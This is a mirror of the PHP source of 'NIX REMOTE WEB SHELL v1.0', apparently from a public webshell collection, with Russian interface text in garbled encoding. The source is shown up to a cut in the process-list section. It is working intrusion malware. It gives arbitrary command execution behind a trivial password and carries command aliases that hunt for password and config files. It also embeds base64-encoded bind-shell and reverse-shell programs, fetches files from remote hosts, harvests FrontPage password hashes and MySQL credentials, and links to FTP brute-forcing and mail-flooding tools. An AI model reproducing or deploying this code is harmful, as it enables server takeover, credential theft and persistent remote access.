mirror of
https://github.com/tennc/webshell
synced 2024-11-26 21:20:18 +00:00
1772 lines
No EOL
66 KiB
Text
1772 lines
No EOL
66 KiB
Text
<?php
|
|
#########################################################
|
|
# NIX REMOTE WEB SHELL #
|
|
# Coded by DreAmeRz Ver 1.0 #
|
|
# ORIGINAL E-MAIL IS: dreamerz@mail.ru #
|
|
#
|
|
#########################################################
|
|
$name="1"; // ëîãèí ïîëüçîâàòåëÿ
|
|
$pass="1"; // ïàðîëü ïîëüçîâàòåëÿ
|
|
if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
|
|
{
|
|
header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
|
|
header("HTTP/1.0 401 Unauthorized");
|
|
exit("Access Denied");
|
|
}
|
|
?>
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
|
<html>
|
|
<head>
|
|
<title>NIX REMOTE WEB-SHELL v.1.0</title>
|
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
|
|
<meta http-equiv="pragma" content="no-cache">
|
|
<meta http-equiv="Content-Language" content="en,ru">
|
|
<META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
|
|
<style type="text/css">
|
|
BODY, TD, TR {
|
|
text-decoration: none;
|
|
font-family: Verdana;
|
|
font-size: 8pt;
|
|
scrollbar-face-color: #FFFFFF;
|
|
scrollbar-shadow-color:#000000 ;
|
|
scrollbar-highlight-color:#FFFFFF;
|
|
scrollbar-3dlight-color: #000000;
|
|
scrollbar-darkshadow-color:#FFFFFF ;
|
|
scrollbar-track-color: #FFFFFF;
|
|
scrollbar-arrow-color: #000000;
|
|
}
|
|
input, textarea, select {
|
|
font-family: Verdana;
|
|
font-size: 10px;
|
|
color: black;
|
|
background-color: red;
|
|
border: solid 1px;
|
|
border-color: black
|
|
}
|
|
UNKNOWN {
|
|
COLOR: black;
|
|
TEXT-DECORATION: none
|
|
}
|
|
A:link {COLOR:black; TEXT-DECORATION: none}
|
|
A:visited { COLOR:black; TEXT-DECORATION: none}
|
|
A:active {COLOR:black; TEXT-DECORATION: none}
|
|
A:hover {color:blue;TEXT-DECORATION: none}
|
|
</STYLE>
|
|
</HEAD>
|
|
|
|
|
|
<BODY bgcolor="#fffcf9" text="#000000">
|
|
<P align=center>[ <A href="javascript:history.next(+1)">Âïåðåä ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
|
|
v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">Íàçàä ]</A>[ <A href="?ac=about" title='×òî óìååò ñêðèïò...'>Î ñêðèïòå ]</a><BR>
|
|
<A href="?ac=info" title='Óçíàé âñå îá ýòîé ñèñòåìå!'>[ Èíôîðìàöèÿ î ñèñòåìå</A> ][ <A href="?ac=navigation" title='Óäîáíàÿ ãðàôè÷åñêàÿ íàâèãàöèÿ. Ïðîñìîòð, ðåäàêòèðîâàíèå...'>Íàâèãàöèÿ</A> ][ <A href="?ac=backconnect" title='Óñòàíîâêà backconnect è îáû÷íîãî áåêäîðà '>Óñòàíîâêà
|
|
áåêäîðà</A> ][ <A href="?ac=eval" title='Ñîçäàé ñâîé ñêðèïò íà php ïðÿìî çäåñü :)'>PHP-êîä</A> ][ <A href="?ac=upload" title='Çàãðóçêà îäíîãî ôàéëà, ìàñcîâàÿ çàãðóçêà, çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà!'>Çàãðóçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell, àëüÿñû...'>Èñïîëíåíèå
|
|
êîìàíä ]</A> <br><A href="?ac=sql" title='Ðàáîòà ñ MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Îòïðàâü å-mail îòñþäà!'>[ Îòïðàâêà ïèñüìà</A> ][ <A href="?ac=mailfluder" title='Òåáÿ êòî-òî äîñòàë? Òîãäà òåáå ñþäà...'>Ìàèëôëóäåð</A>
|
|
][ <A href="?ac=tools" title='Êîäèðîâùèêè/äåêîäèðîâùèêè md5, des, sha1, base64... '>Èíñòðóìåíòû ]</A>[ <A href="?ac=ps" title='Îòîáðàæàåò ñïèñîê ïðîöåññîâ íà ñåðâåðå è ïîçâîëÿåò èõ óáèâàòü!'>Äåìîíû</A> ][ <A href="?ac=art" title='Àëüòåðíàòèâíûå ìåòîäû âçëîìà...'>Àëüòåðíàòèâíûå ìåòîäû</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Íàäîåë ýòîò ñåðâåð? Òîãäà ìîæíî óäàëèòü è øåëë...'>Óäàëèòü øåëë</A> ]</P>
|
|
<?php
|
|
if (ini_get('register_globals') != '1') {
|
|
|
|
if (!empty($HTTP_POST_VARS))
|
|
extract($HTTP_POST_VARS);
|
|
|
|
if (!empty($HTTP_GET_VARS))
|
|
extract($HTTP_GET_VARS);
|
|
if (!empty($HTTP_SERVER_VARS))
|
|
extract($HTTP_SERVER_VARS);
|
|
}
|
|
Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
|
|
set_magic_quotes_runtime(0);
|
|
set_time_limit(0); // óáðàòü îãðàíè÷åíèå ïî âðåìåíè
|
|
ignore_user_abort(1); // èãíîðèðîâàòü ðàçðûâ ñâÿçè ñ áðàóçåðîì
|
|
error_reporting(0);
|
|
$self = $_SERVER['PHP_SELF'];
|
|
$docr = $_SERVER['DOCUMENT_ROOT'];
|
|
$sern = $_SERVER['SERVER_NAME'];
|
|
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
|
|
$aliases=array(
|
|
'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
|
|
'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî suid-áèòîì' => 'find / -type f -perm -04000 -ls',
|
|
'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find / -type f -perm -02000 -ls',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find . -type f -perm -02000 -ls',
|
|
'ïîèñê íà ñåðâåðå ôàéëîâ config' => 'find / -type f -name "config*"',
|
|
'ïîèñê íà ñåðâåðå ôàéëîâ admin' => 'find / -type f -name "admin*"',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config' => 'find . -type f -name "config*"',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ pass' => 'find . -type f -name "pass*"',
|
|
'ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find / -perm -2 -ls',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find . -perm -2 -ls',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd',
|
|
'ïîèñê íà ñåðâåðå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd',
|
|
'ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd',
|
|
'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history',
|
|
'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
|
|
'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
|
|
'âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va',
|
|
'ïðîñìîòð îòêðûòûõ ïîðòîâ' => 'netstat -an | grep -i listen',
|
|
'ïîèñê âñåõ php-ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password',
|
|
'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777',
|
|
'Îïðåäåëåíèå âåðñèè ÎÑ' =>'sysctl -a | grep version',
|
|
'Îïðåäåëåíèå âåðñèè ÿäðà' =>'cat /proc/version',
|
|
'Ïðîñìîòð syslog.conf' =>'cat /etc/syslog.conf',
|
|
'Ïðîñìîòð Message of the day' =>'cat /etc/motd',
|
|
'Ïðîñìîòð hosts' =>'cat /etc/hosts',
|
|
'Âåðñèÿ äèñòðèáóòèâà 1' =>'cat /etc/issue.net',
|
|
'Âåðñèÿ äèñòðèáóòèâà 2' =>'cat /etc/*-realise',
|
|
'Ïîêàçàòü âñå ïðîöåñû' =>'ps auxw',
|
|
'Ïðîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux',
|
|
'Ïîèñê httpd.conf' =>'locate httpd.conf');
|
|
|
|
|
|
|
|
/* Port bind source */
|
|
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
|
|
jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
|
|
ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
|
|
0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
|
|
mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
|
|
KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
|
|
hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
|
|
OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
|
|
rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
|
|
kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
|
|
7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
|
|
wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
|
|
6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
|
|
hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
|
|
pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
|
|
sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
|
|
0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
|
|
lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
|
|
9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
|
|
pDQpyZXR1cm4gMDsNCn0=";
|
|
|
|
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
|
|
AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
|
|
NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
|
|
QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
|
|
pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
|
|
JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
|
|
0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
|
|
FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
|
|
YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
|
|
NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
|
|
9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
|
|
|
|
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
|
|
HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
|
|
DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
|
|
HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
|
|
CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
|
|
GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
|
|
WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
|
|
iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
|
|
VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
|
|
FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
|
|
|
|
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
|
|
KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
|
|
pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
|
|
ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
|
|
uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
|
|
9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
|
|
zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
|
|
QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
|
|
sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
|
|
pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
|
|
zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
|
|
sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
|
|
|
|
if(isset($uploadphp))
|
|
{
|
|
$socket=fsockopen($iphost,$loadport); //connect
|
|
fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //request
|
|
while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
|
|
unset($buffer); }
|
|
while(!feof($socket)) $buffer.=fread($socket, 1024);
|
|
$file_size=strlen($buffer);
|
|
$f=fopen($loadnewname,"wb+");
|
|
fwrite($f, $buffer, $file_size);
|
|
echo "Ðàçìåð çàãðóæåííîãî ôàéëà: $file_size <b><br><br>" ;
|
|
}
|
|
|
|
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
|
|
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
|
|
else {$ac = "navigation";}
|
|
|
|
|
|
|
|
switch($ac) {
|
|
|
|
// Shell
|
|
case "shell":
|
|
echo "<SCRIPT LANGUAGE='JavaScript'>
|
|
<!--
|
|
function pi(str) {
|
|
document.command.cmd.value = str;
|
|
document.command.cmd.focus();
|
|
}
|
|
//-->
|
|
</SCRIPT>";
|
|
|
|
/* command execute */
|
|
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
|
|
|
|
if (($_POST['alias']) AND ($_POST['alias']!==""))
|
|
{
|
|
foreach ($aliases as $alias_name=>$alias_cmd) {
|
|
if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
|
|
}
|
|
}
|
|
|
|
|
|
echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
|
|
echo "<b>";
|
|
echo "<div align=center><textarea name=report cols=145 rows=20>";
|
|
echo "".passthru($_POST['cmd'])."";
|
|
echo "</textarea></div>";
|
|
echo "</b>";
|
|
?>
|
|
</td></tr>
|
|
|
|
<tr><b><div align=center>:: Âûïîëíåíèå êîìàíä íà ñåðâåðå ::</div></b></font></td></tr>
|
|
<tr><td height=23>
|
|
<TR>
|
|
<CENTER>
|
|
<TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('perl ');" class=fcom>perl</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
|
|
<TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
|
|
</CENTER>
|
|
</TR>
|
|
|
|
<?
|
|
/* command execute form */
|
|
echo "<form name=command method=post>";
|
|
|
|
echo "<b>Âûïîëíèòü êîìàíäó</b>";
|
|
echo "<input type=text name=cmd size=85><br>";
|
|
echo "<b>Ðàáî÷àÿ äèðåêòîðèÿ </b>";
|
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
|
|
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
|
|
echo "<input type=submit name=submit value=Âûïîëíèòü>";
|
|
|
|
echo "</form>";
|
|
|
|
/* aliases form */
|
|
echo "<form name=aliases method=POST>";
|
|
echo "<font face=Verdana size=-2>";
|
|
echo "<b> Âûáåðèòå àëèàñ<font face=Wingdings color=gray></font> </b>";
|
|
echo "<select name=alias>";
|
|
foreach ($aliases as $alias_name=>$alias_cmd)
|
|
{
|
|
echo "<option>$alias_name</option>";
|
|
}
|
|
echo "</select>";
|
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
|
echo " <input type=submit name=submit value=Âûïîëíèòü>";
|
|
echo "</font>";
|
|
echo "</form>";
|
|
|
|
|
|
break;
|
|
case "art":
|
|
echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
|
|
Ýêñïëîéò äëÿ FrontPage. Ñîáèðàåò ÷èòàåìûå .htpassword ôàéëû ïî âñåìó ñåðâåðó. Ïîçâîëÿåò ñîçäàòü íåõèëóþ áàçó âñåõ ñàéòîâ â âèäå ëîãèí:ïàðîëü îò õîñòåðà, òî åñòü ïàðîëè ê FrontPage ïîäõîäÿò ê FTP è äðóãèì ñåðâèñàì ñåðâåðà. Ðàññøèôðîâêà ïðîèçâîäèòñÿ ñ ïîìîùüþ John The Ripper (Standart/DES).<br><br>
|
|
<a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
|
|
Ýêñïëîèò, ïîçâîëÿþùèé îáëåã÷èòü ïîèñê ïàðîëåé ê áàçå äàííûõ. Ïðîèçâîäèòñÿ ïîèñê ôàéëîâ ñ óïîìèíàíèåì ðÿäà ñòðîê, óêàçûâàþùèõ íà êîííåêò ê MySQL. Òàêæå âîçìîæíî ñîâïàäåíèå ïàðîëåé ñ äðóãèìè ñåðâèñàìè ñåðâåðà. Ïàðîëè â áîëüøåíñòâå ñëó÷àåâ èëè âîâñå íå çàøèôðîâàíû, èëè çàøèôðîâàíû îáðàòèìûì àëãîðèòìîì. Ïðîàíàëèçèðîâàâ ôàéëû, óêàçàííûå ýêñïëîèòîì, âû áûñòðî íàéäåòå ïàðîëü ê MySQL.<br><br>
|
|
<a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
|
|
Ïîëíîöåííûé áðóòôîðñåð, ðàáîòàþùèé ïî ìåòîäó ïîäñòàíîâêè ïàðîëåé, êîòîðûå áåðåò èç ôàéëà. Ôàéë ãåíåðèðóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàðîëåé è... âñå - ïåðåáîð íà÷èíàåòñÿ!!! Ñ ïîìîùüþ äàííîãî áðóòôîðñåðà âû ñìîæåòå ïîäîáðàòü ïàðîëü ê ëþáîìó õîñòèíãó áåç ïðîáëåì! ×òîáû áûëî ÷òî ïåðåáèðàòü, áûëà äîáàâëåíà áàçà ïàðîëåé, êîòîðàÿ ãåíåðèðóåòñÿ íà ëåòó (íå ïèøèòå áîëüøèå öèôðû â êîëè÷åñòâå ïàðîëåé, òàê êàê ýòî ñåðüåçíàÿ íàãðóçêà íà ñåðâåð! 10000 âïîëíå õâàòèò).<br><br>
|
|
<a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
|
|
Ýêñïëîèò ïîçâîëÿåò ïåðåáðàòü àêêàóíò íà FTP íà ñâÿçêó login:login. ×åì áîëüøå þçåðîâ â /etc/passwd, òåì áîëüøå âåðîÿòíîñòü óäà÷íîé ðàáîòû ýêñïëîèòà.<br><br>
|
|
<a href='?ac=shell'><b>Íåêîòîðûå äðóãèå ìèíè-ýêñïëîèòû ïðèâåäåíû çäåñü â àëüÿñàõ.</b></a><br>";
|
|
break;
|
|
case "frontpage":
|
|
$p=getenv("DOCUMENT_ROOT");
|
|
if(exec("cat /etc/passwd")){
|
|
$ex=explode("/", $p);
|
|
$do_login=substr($p,0,strpos($p,$ex[2]));
|
|
$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
|
|
exec("cat /etc/passwd", $passwd);
|
|
for($i=0; $i<=count($passwd); $i++) {
|
|
$xz=explode(":", $passwd[$i]);
|
|
$file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
|
|
if(exec("cat ".$file)){
|
|
exec("cat ".$file,$open);
|
|
$a=$open[count($open)-1];
|
|
$fr=strpos($a, ":");
|
|
$open1=substr($a, $fr);
|
|
if($xz[4]=='') {
|
|
$file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
|
|
Unset($domain);
|
|
exec("cat ".$file1,$domain);
|
|
$domain1=explode(" ",$domain[8]);
|
|
$xz[4]=$domain1[1];
|
|
}
|
|
echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
|
|
} }
|
|
}
|
|
elseif(is_file("/etc/passwd")){
|
|
$ex=explode("/", $p);
|
|
$passwd="/etc/passwd";
|
|
echo "Ïóòü: ".$p."<br>";
|
|
$do_login=substr($p,0,strpos($p,$ex[2]));
|
|
$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
|
|
if(is_file($passwd)) {
|
|
$open=fopen($passwd,"r");
|
|
while (!feof($open)) {
|
|
$str=fgets($open, 100);
|
|
$mas=explode(":", $str);
|
|
$file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
|
|
if(is_file($file)) {
|
|
echo $mas[0];
|
|
$open1=fopen($file, "r");
|
|
$str1=fread($open1,filesize($file));
|
|
fclose($open1);
|
|
$fr=strpos($str1, ":");
|
|
$str2=substr($str1, $fr);
|
|
$str2=rtrim($str2);
|
|
//
|
|
if($mas[4]=='') {
|
|
$file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
|
|
$open2=fopen($file1,"r");
|
|
$domain=fread($open2,filesize($file1));
|
|
fclose($open2);
|
|
$domain1=substr($domain,106,110);
|
|
$domain2=explode("AuthUserFile",$domain1);
|
|
$mas[4]=$domain2[0];
|
|
}
|
|
//
|
|
echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
|
|
}
|
|
}
|
|
fclose($open);
|
|
}
|
|
}
|
|
else{
|
|
echo "Ñ ïàññîì îáëîì :(((";
|
|
}
|
|
break;
|
|
case "dbexploit":
|
|
echo "<PRE>";
|
|
echo "<b>Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_connect: </b><br>";
|
|
exec("find / -name *.php | xargs grep -li mysql_connect");
|
|
exec("find / -name *.inc | xargs grep -li mysql_connect");
|
|
exec("find / -name *.inc.php | xargs grep -li mysql_connect");
|
|
echo "<b>Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_select_db: </b><br>";
|
|
exec("find / -name *.php | xargs grep -li mysql_select_db");
|
|
exec("find / -name *.inc | xargs grep -li mysql_select_db");
|
|
exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
|
|
echo "<b>Â ôàéëå ïðèñóòñòâóåò óïîìèíàíèå ïàðîëÿ: </b><br>";
|
|
exec("find / -name *.php | xargs grep -li $password");
|
|
exec("find / -name *.inc | xargs grep -li $password");
|
|
exec("find / -name *.inc.php | xargs grep -li $password");
|
|
exec("find / -name *.php | xargs grep -li $pass");
|
|
exec("find / -name *.inc | xargs grep -li $pass");
|
|
exec("find / -name *.inc.php | xargs grep -li $pass");
|
|
echo "<b>Â ôàéëå ïðèñóòñòâóåò ñëîâî localhost: </b><br>";
|
|
exec("find / -name *.php | xargs grep -li localhost");
|
|
exec("find / -name *.inc | xargs grep -li localhost");
|
|
exec("find / -name *.inc.php | xargs grep -li localhost");
|
|
echo "</PRE>";
|
|
break;
|
|
// ñïèñîê ïðîöåññîâ
|
|
case "ps":
|
|
echo "<b>Ïðîöåññû â ñèñòåìå:</b><br>";
|
|
|
|
echo "<br>";
|
|
if ($pid)
|
|
{
|
|
if (!$sig) {$sig = 9;}
|
|
echo "Îòïðàâëåíèå êîìàíäû ".$sig." to #".$pid."... ";
|
|
$ret = posix_kill($pid,$sig);
|
|
if ($ret) {echo "Âñå, ïðîöåññ óáèò, àìèíü";}
|
|
else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïðîöåññå #".htmlspecialchars($pid).".";}
|
|
}
|
|
$ret = `ps -aux`;
|
|
if (!$ret) {echo "Íåâîçìîæíî îòîáðàçèòü ñïèñîê ïðîöåññîâ! Âèäíî, çëîé àäìèí çàïðåòèë ps";}
|
|
else
|
|
